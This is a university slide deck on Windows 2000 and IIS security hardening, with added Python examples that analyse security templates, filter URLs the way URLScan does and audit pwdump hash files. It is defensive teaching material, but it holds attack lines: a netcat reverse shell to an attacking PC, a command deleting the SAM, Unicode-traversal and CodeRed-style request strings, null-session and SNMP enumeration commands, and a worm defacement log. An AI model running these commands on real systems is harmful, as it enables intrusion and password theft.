Windows 2000 Security
Matthew Cook
Loughborough University
http://www.escarpment.net/
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
Janet Web Cache Service
http://wwwcache.ja.net
Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security
advice
✦ Need for other OS security advice
✦ Installation of Internet-facing Windows 2000 systems.
Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security
✦ Server Security
✦ IIS Security
✦ Security Tools
✦ Questions and Answers
Physical Security
"The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete bunker, and is surrounded by … very highly paid armed guards. Even then, I wouldn't stake my life on it."
Gene Spafford
Security Threats
✦ Denial of Service
✦ Theft of information
✦ Modification
✦ Fabrication (Spoofing or Masquerading)
Security Holes
✦ Physical Security Holes
✦ Software Security Holes
✦ Incompatible Usage Security Holes
✦ Social Engineering
✦ Complacency
Workstation Security
Security for General Workstations
Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLs
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’ service packs and hotfixes (test them before rolling them out)
✦ Re-check the machines periodically: hotfixes keep appearing between service packs
✦ Hfnetchk tool (compares the hotfixes installed against Microsoft's XML list)
NTFS ACLs
✦ Ensure you use NTFS
✦ Partition your drives per application
✦ Use xcacls from the Resource Kit
✦ Script NTFS security
✦ Set using Security Templates
✦ Example
Policies and Profiles
✦ NT Policy files (.pol, from System Policy Editor) are different to GPOs (Group Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\GroupPolicy
✦ AD GPOs located in the domain's SYSVOL share:
%windir%\SYSVOL\sysvol\camford\Policies
✦ Demonstration
Security Templates
✦ Use the ‘Security Settings’ snap-in (Security Configuration and Analysis, or secedit from a script) to apply
✦ Located in %windir%\security\templates
✦ Quick and easy to apply
✦ Templates are cumulative: each one changes only the settings it defines, so the order of application decides which value wins
✦ Demonstration
Security Templates…
✦ Setup security – default settings applied at installation
✦ Compatws – compatible (relaxes ACLs so legacy applications run without making users Power Users)
✦ Basicdc/sv/wk – basic security (domain controller, server, workstation)
✦ Securedc/ws – more secure
✦ Hisecdc/ws – further security (assumes every communication partner is also Windows 2000)
✦ Ocfiless/w – optional component file security (server/workstation)
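The cumulative behaviour of templates, worked through as an added Python example (this is not code from the slides or from Microsoft's tools). The template snippets are constructed and cut down to a handful of keys; their values are illustrative, not copied from the shipped .inf files. `apply_templates` layers templates in order, and `analyze` mimics what the Analyze step of the snap-in reports: every setting in a template that differs from the machine's current state.

```python
import configparser

# Constructed, cut-down template snippets in the [Section] / key = value layout
# of the Windows 2000 .inf templates. Assumption: the values are illustrative
# and trimmed; the shipped templates carry many more keys.
SETUP_SECURITY = r"""
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Registry Values]
MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0
MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,0
"""

SECUREWS = r"""
[System Access]
MinimumPasswordLength = 8
PasswordComplexity = 1
LockoutBadCount = 5
[Registry Values]
MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,1
"""

HISECWS = r"""
[Registry Values]
MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,2
MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
"""


def parse_template(text):
    """Parse one template into {section: {key: value}}.
    Key case is preserved (optionxform) because the keys are registry paths."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return {section: dict(cp[section]) for section in cp.sections()}


def apply_templates(current, *templates):
    """Apply templates in order on top of `current` and return the new state.
    Templates are cumulative: each one overrides only the settings it names
    and leaves everything else as it was, so order decides which value wins."""
    state = {section: dict(keys) for section, keys in current.items()}
    for template in templates:
        for section, keys in parse_template(template).items():
            state.setdefault(section, {}).update(keys)
    return state


def analyze(state, template):
    """What the 'Analyze' step of Security Configuration and Analysis reports:
    each template setting whose value differs from the machine's current value."""
    mismatches = []
    for section, keys in parse_template(template).items():
        for key, wanted in keys.items():
            actual = state.get(section, {}).get(key)
            if actual != wanted:
                mismatches.append((section, key, actual, wanted))
    return mismatches


if __name__ == "__main__":
    machine = apply_templates({}, SETUP_SECURITY, SECUREWS)
    for section, key, actual, wanted in analyze(machine, HISECWS):
        print(f"[{section}] {key}: is {actual}, hisecws wants {wanted}")
```

Note that after applying securews on top of the defaults the signing key still carries its default value, because securews never mentions it; only hisecws does. That is the sense in which the templates accumulate.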
Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure the Audit Policy has been configured (by default Windows 2000 audits nothing)
✦ Check the Event Viewer regularly
✦ Or Use NTLast (Foundstone)
✦ URL: http://www.foundstone.com/
✦ Or ELM (TNT Software)
✦ URL: http://www.tntsoftware.com/
Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg
✦ EFS
✦ DOS Boot disc
✦ Linux Boot disc
✦ BIOS Passwords
PipeUpAdmin & PipeUpSAM
✦ Uses a named-pipe impersonation vulnerability in the Service Control Manager (SCM): a local user pre-creates the pipe a service will connect to and impersonates it
✦ Adds the user to the Administrators group
✦ Patch Bulletin: MS00-053
✦ URL: http://www.dogmile.com/files/
Netddemsg
✦ Uses a vulnerability in NetDDE (the NetDDE Agent accepts requests from any local user)
✦ Runs cmd.exe in the SYSTEM context
✦ Patch Bulletin: MS01-007
✦ NOT included in Windows 2000 SP2
EFS
✦ Resetting the password of the recovery agent (Administrator by default) hands the attacker the recovery key for every encrypted file
✦ Resetting the password of the user: on Windows 2000 a reset keeps the user's EFS keys usable, so whoever resets it can decrypt the files
✦ EFS temporary files: the plaintext copy made during encryption can survive on disk
DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLs
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL: http://www.esiea.fr/public_html/Christophe.GRENIER/
Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY
✦ Limited SCSI support
✦ URL: http://home.eunet.no/~pnordahl/
BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities
✦ Check for Default Passwords
✦ Upgrade BIOS
✦ URL: http://www.esiea.fr/public_html/Christophe.GRENIER/
Server Security
Security for Internet Facing Servers
Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services
✦ Hfnetchk and Qchain
✦ SNMP Vulnerabilities
✦ Active Directory Vulnerabilities
✦ IPSec
NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]
✦ SMB over TCP [Port 445]
✦ Port 445 (direct-hosted SMB, no NetBIOS layer) is new in Windows 2000
✦ Block TCP/UDP 135-139 and 445 at the
firewall
NetBIOS/SMB Services…
Null authentication (anonymous IPC$ session):
net use \\camford\IPC$ "" /u:""
✦ Famous tools like ‘Red Button’ rely on it
net view \\camford
✦ Investigate srvcheck and srvinfo in the Resource Kit
NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com
✦ Enum from Razor
✦ URL: http://razor.bindview.com/
✦ A Google search reveals many, many more
NetBIOS/SMB Services…
To disable NetBIOS:
1. Select ‘Disable NetBIOS over TCP/IP’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Print Sharing for Microsoft Networks’ in the advanced settings of the ‘Network and Dial-up Connections’ window.
NetBIOS/SMB Services…
Disable Null Authentication
✦ Key similar to Windows NT 4.0
✦ HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
✦ REG_DWORD set to 0, 1 or 2! (0 = no restriction; 1 = hide account names and shares; 2 = no anonymous access at all, Windows 2000 only, and it can break down-level trusts and services)
✦ HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
✦ REG_DWORD set to 0 or 1
Hfnetchk
✦ Use Hfnetchk to check hotfixes
✦ Checks machines against Microsoft's XML list of hotfixes (mssecure.xml)
✦ Automate the process using batch files and a command-line mail client (Postie)
✦ URL: http://www.infradig.com/infradig/postie/
✦ Use QChain to chain hotfixes together without rebooting in between.
Hfnetchk…
Patch details for:
✦ Windows NT 4.0 and Windows 2000
✦ IIS 4 and IIS 5
✦ SQL Server 7.0
✦ SQL Server 2000
✦ Internet Explorer 5.01 (and later)
Hfnetchk…
✦ Default scan of local host (pre-downloaded XML)
hfnetchk -x mssecure.xml
✦ Default scan of the lboro domain
hfnetchk -d lboro
✦ Verbose scan of local host
hfnetchk -v -x mssecure.xml
✦ Verbose scan including installed hotfixes
hfnetchk -v -a b -x mssecure.xml
Hfnetchk…
✦ Test problems
hfnetchk -z -v -x mssecure.xml
✦ XML file download
http://download.microsoft.com/download/xml/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk -x http://camford.ac.uk/mssecure.xml
hfnetchk -x s:\camford\mssecure.xml
QChain
Supported by:
✦ Windows NT 4.0
✦ Windows 2000
✦ Windows XP (25th October 2001)
QChain…
✦ Run each hotfix with -z (no reboot) and -m (quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29821
SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ snmpwalk camford public .1.3.6.1.4.1.77.1.2.25 (the LAN Manager MIB user table: with the default ‘public’ community this lists every account on the box)
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services
✦ Set community names
✦ Set accepted hosts
SNMP Vulnerabilities… (screenshot slide)
AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained in the Windows 2000 Support Tools (on the installation CD)
✦ Authenticated connection needed
✦ Filter TCP 389 (LDAP) and 3268 (Global Catalog) at the firewall
✦ DNS – restrict zone transfers to your slave name servers only (AD publishes its SRV records in DNS)
IPSec
✦ Currently investigating
✦ Linux connectivity using FreeS/WAN
✦ Mainly for wireless use
✦ WEP encryption cracked (AirSnort recovers the key from passively captured traffic)
✦ URL: http://www.freeswan.org/
✦ URL: http://airsnort.sourceforge.net/
IIS Security
Internet Information Server
IIS Security
✦ History
✦ Recent Worms
✦ IIS Lock Down Tool
✦ URL Scan
✦ The Future
IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0
✦ Quickly gained reputation for (in)security
✦ IIS 5.0 Installed by Windows 2000
✦ Microsoft releases Hfnetchk
✦ Closely followed by IIS Lockdown and
URLScan
Recent Worms
✦ Sadmind/IIS
Directory Traversal (Unicode Exploit, MS00-078)
✦ CodeRed
ida/idq buffer overflow (MS01-033)
✦ CodeGreen
ida/idq buffer overflow (MS01-033); a ‘counter-worm’ entering through the same hole
✦ Nimda
Directory Traversal (Unicode Exploit, MS00-078), plus the double-decode bug (MS01-026) and the root.exe backdoors left by earlier worms
Sadmind/IIS
IIS log entry of the defacement: the worm runs /scripts/root.exe (its copy of cmd.exe) and echoes an HTML page over default.htm:
✦ 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
System Attacks
✦ Monday Morning Phone Call
✦ Perl Script ‘unicodeloader’
✦ http://camford/scripts/upload.asp
✦ http://camford/scripts/cmdasp.asp
✦ Sadmind/IIS worm and unicodeloader kit
✦ GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 – (the log shows the path after IIS has decoded it; on the wire the ‘/’ was sent as the overlong %c0%af)
✦ URL: http://www.sensepost.com/
System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc -l -p 1234
✦ Camford:
nc.exe -v -e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/
System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI DLL calling RevertToSelf (Horovitz): an in-process ISAPI extension drops the IUSR impersonation and runs as SYSTEM
✦ Upload it using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-026
✦ NOT included in Windows 2000 SP2
IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex
servers
✦ Undo facility to reverse last ‘lock down’
✦ URL: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362
IIS Lock Down Tool…
Disable:
✦ Active Server Pages
✦ Index Server Interface
✦ Server Side Includes
✦ Internet Data Connector
✦ Internet Printing
✦ HTR Scripting
Remove:
✦ Sample Web Files
✦ Script Virtual Directory
✦ MSADC Directory
✦ WebDAV
Set Permissions on:
✦ Exe files
✦ Content Directories
URL Scan
✦ ISAPI filter that scans incoming HTTP requests before IIS processes them
✦ Filtered based on a rule set (urlscan.ini)
✦ New rules easily added
✦ Default urlscan.ini is tuned for static pages; loosen it for dynamic sites
✦ Restart the web service when changes are made
✦ Requests that match a rule get a 404 and are logged
✦ URL: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32571
URL Scan…
Filter on:
✦ The request method (verb)
✦ File Extension
✦ URL Encoding
✦ Non ASCII characters
✦ Malicious character sequence
✦ Headers in HTTP GET
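The filtering described above, and the worm requests from the Recent Worms and System Attacks slides, worked through as an added Python example (this is not URLScan's own code, nor code from the slides). The rule set is a constructed, simplified subset modelled on the sections of urlscan.ini; the request lines are constructed in the shape of the deck's log extracts, not real captures. The point is which rule catches which attack: the overlong %c0%af traversal trips the high-bit and dot-in-path checks, the ..%255c.. form trips the normalization check, and the .ida overflow is stopped by extension alone.

```python
from urllib.parse import unquote_to_bytes

# Constructed rule set modelled on urlscan.ini sections. Assumption: this is a
# simplified subset; the shipped urlscan.ini defaults are longer and differ in detail.
ALLOW_VERBS = {"GET", "HEAD", "POST"}                       # [AllowVerbs]
DENY_EXTENSIONS = {".exe", ".bat", ".cmd", ".com",           # system utilities
                   ".ida", ".idq", ".htw",                   # Index Server interface
                   ".idc", ".htr", ".shtml", ".shtm", ".stm", ".printer"}
DENY_SEQUENCES = ["..", "./", "\\", ":", "%", "&"]           # [DenyUrlSequences]
ALLOW_HIGH_BIT = False                                       # AllowHighBitCharacters=0
ALLOW_DOT_IN_PATH = False                                    # AllowDotInPath=0


def scan_request(method, url):
    """Return the list of rules a request breaks; an empty list means it passes."""
    reasons = []
    if method.upper() not in ALLOW_VERBS:
        reasons.append(f"verb {method} not in AllowVerbs")

    path = url.split("?", 1)[0]                    # the path is scanned, not the query
    decoded = unquote_to_bytes(path.encode("latin-1", "replace"))  # one %XX decode, as IIS does
    if unquote_to_bytes(decoded) != decoded:       # a second decode still changes it
        reasons.append("double-encoded URL fails normalization check")
    if not ALLOW_HIGH_BIT and any(b >= 0x80 for b in decoded):
        reasons.append("non-ASCII byte in URL (e.g. overlong %c0%af for '/')")

    text = decoded.decode("latin-1")
    segments = text.split("/")
    if not ALLOW_DOT_IN_PATH and any("." in seg for seg in segments[:-1]):
        reasons.append("dot in a directory segment (AllowDotInPath=0)")
    last = segments[-1]
    ext = last[last.rfind("."):].lower() if "." in last else ""
    if ext in DENY_EXTENSIONS:
        reasons.append(f"extension {ext} in DenyExtensions")
    for seq in DENY_SEQUENCES:
        if seq in text:
            reasons.append(f"sequence {seq!r} in DenyUrlSequences")
    return reasons


def respond(method, url):
    """URLScan's visible behaviour: a matched request gets a 404 and a log entry."""
    reasons = scan_request(method, url)
    status = 404 if reasons else 200
    log_line = f"{status} {method} {url}"
    if reasons:
        log_line += " rejected: " + "; ".join(reasons)
    return status, log_line


# Constructed request lines in the shape of the deck's log extracts (not real captures).
SAMPLE_REQUESTS = [
    ("GET", "/index.htm"),
    ("GET", "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"),        # Unicode traversal (sadmind/Nimda)
    ("GET", "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir"),         # double decode (Nimda)
    ("GET", "/default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3"),  # .ida overflow (CodeRed)
    ("GET", "/scripts/root.exe?/c+dir"),                                 # root.exe copy of cmd.exe left by the worm
    ("PROPFIND", "/"),                                                   # WebDAV verb
]

if __name__ == "__main__":
    for method, url in SAMPLE_REQUESTS:
        print(respond(method, url)[1])
```

The order of checks matters less than the fact that decoding happens exactly once before the sequence test: decoding twice would hide the ..%255c.. trick, decoding zero times would let %c0%af through the dot check.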
The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6
✦ Lock Down Tool is an interim measure
✦ HTTP listener functionality moving into the kernel (TechEd)
✦ IIS Lockdown included in SP3
✦ Further implications for .NET
Security Tools
A look at the freeware and ‘pay for’ tools available.
Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
Snort
✦ IDS – Intrusion Detection System
✦ Libpcap-based packet sniffer and logger
✦ Originally developed for Unix platforms
✦ Open source
✦ Port to Win32 available (release 1.8.1)
✦ Installation on Win32 in under 30 minutes
✦ Run on your IIS server or on a standalone sensor
Snort…
Snort can detect:
✦ Stealth Port Scans
✦ CGI Attacks
✦ FrontPage Extensions Attacks
✦ ICMP Activity
✦ SMTP Activity
✦ SQL Activity
✦ SMB Probes
Snort…
✦ Default logging to snort\logs\alert.ids
✦ Log to MySQL and SQL Server
✦ Notification as logs, ‘winpopup’, email etc.
✦ SnortSnarf or ACID (PHP based) for browsing the alerts
✦ GUI – IDScenter
✦ URL: http://snort.sourcefire.com/
✦ URL: http://www.cert.org/kb/acid/
✦ URL: http://www.silicondefense.com/
Snort… (screenshot slide)
CIS and Typhon
✦ Typhon, formerly Cerberus Internet Scanner (CIS)
✦ Written by David Litchfield
✦ URL: http://www.nextgenss.com/
✦ Demonstration
CIS and Typhon
✦ Web Checks
✦ FTP Checks
✦ SMTP Checks
✦ POP3 Checks
✦ NT Checks
✦ NetBIOS Checks
✦ MS SQL Checks
✦ SNMP Checks
✦ RPC Checks
✦ Portscan (TCP/UDP)
✦ Finger Checks
✦ DNS Checks
✦ Commercial Version
Pwdump
✦ Version 3 (pwdump3e: the ‘e’ denotes encrypted transfer of the hashes from a remote machine)
✦ Developed by Phil Staubs and Erik Hjelmstad
✦ Based on pwdump and pwdump2
✦ URL: http://www.ebiz-tech.com/html/pwdump.html
Pwdump…
✦ Needs administrative privileges
✦ Extracts hashes even if SYSKEY is installed
✦ Extract from remote machines
✦ Identifies accounts with no password
✦ Self contained utility
Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application
✦ Requires psapi.dll (Windows NT 4.0)
✦ URL: http://www.foundstone.com/
✦ Demonstration
L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources
✦ Registration $249
✦ URL: http://www.atstake.com/research/lc3/
✦ Demonstration
L0pht Crack…
Crack Passwords from:
✦ Local Machine
✦ Remote Machine
✦ SAM File
✦ SMB Sniffer
✦ PWDump file
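What an auditor reads off a pwdump file before feeding it to L0phtCrack, as an added Python example (not code from the slides, from pwdump or from L0phtCrack). It covers the ‘identifies accounts with no password’ point on the Pwdump slide and the PWDump-file input on this one. The sample lines are constructed in pwdump's `user:rid:lmhash:nthash:::` layout; the non-empty hash values are placeholders rather than hashes of any real password. The two empty-hash constants are the genuine LM and NT hashes of the empty string, which is what the check relies on.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM_HALF = EMPTY_LM[16:]                     # LM hash of an empty 7-byte half

# Constructed pwdump-format lines (user:rid:lmhash:nthash:::). Assumption: the
# non-empty hash values are placeholders, not hashes of any real password.
SAMPLE = """\
Administrator:500:1234567890abcdef1234567890abcdef:fedcba0987654321fedcba0987654321:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mcook:1001:0123456789abcdefaad3b435b51404ee:1111111122222222333333334444444a:::
backup:1002:aad3b435b51404eeaad3b435b51404ee:5555555566666666777777778888888b:::
"""


def is_empty(hash_value, empty_constant):
    """pwdump variants print either the literal empty-password hash or a
    'NO PASSWORD*****' marker for an account that has none."""
    value = hash_value.lower()
    return value == empty_constant or value.startswith("no password")


def audit_pwdump(text):
    """Map each account name to the findings an auditor would take from its line."""
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        notes = []
        if rid == "500":
            # The RID survives renaming, so this is how a renamed Administrator is spotted.
            notes.append("RID 500: the built-in Administrator account, whatever it is named")
        if is_empty(nt, EMPTY_NT):
            notes.append("no password set")
        elif is_empty(lm, EMPTY_LM):
            # Empty LM with a real NT hash: the password is over 14 characters,
            # or LM hash storage has been disabled. Not an empty password.
            notes.append("no LM hash stored (password over 14 characters or LM hashing disabled)")
        else:
            notes.append("LM hash stored: two independent 7-character halves, crackable with L0phtCrack")
            if lm.lower().endswith(EMPTY_LM_HALF):
                notes.append("password is 7 characters or fewer (second LM half is the empty block)")
        report[user] = notes
    return report


if __name__ == "__main__":
    for user, notes in audit_pwdump(SAMPLE).items():
        print(user + ":")
        for note in notes:
            print("    " + note)
```

The distinction between Guest and backup is the one that matters: both show the empty LM hash, but only Guest also has the empty NT hash, and only that combination means there is no password.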
Nmap
✦ Port scanning tool
✦ Stealth scanning, OS fingerprinting
✦ Open source
✦ Runs under Unix-based OS
✦ Win32 port under development
✦ URL: http://www.insecure.org/nmap/
Nmap… (screenshot slide)
Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive
✦ Frequently updated modules
✦ Testing of DoS attacks (optional plugins that can crash the target)
✦ Open Source
✦ Win32 and Java Client
✦ URL: http://nessus.org/
Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32
✦ Excellent tool to evaluate Netware security
✦ Open Source
✦ Lots of additional information
✦ URL: http://www.nmrc.org/pandora/
Questions and Answers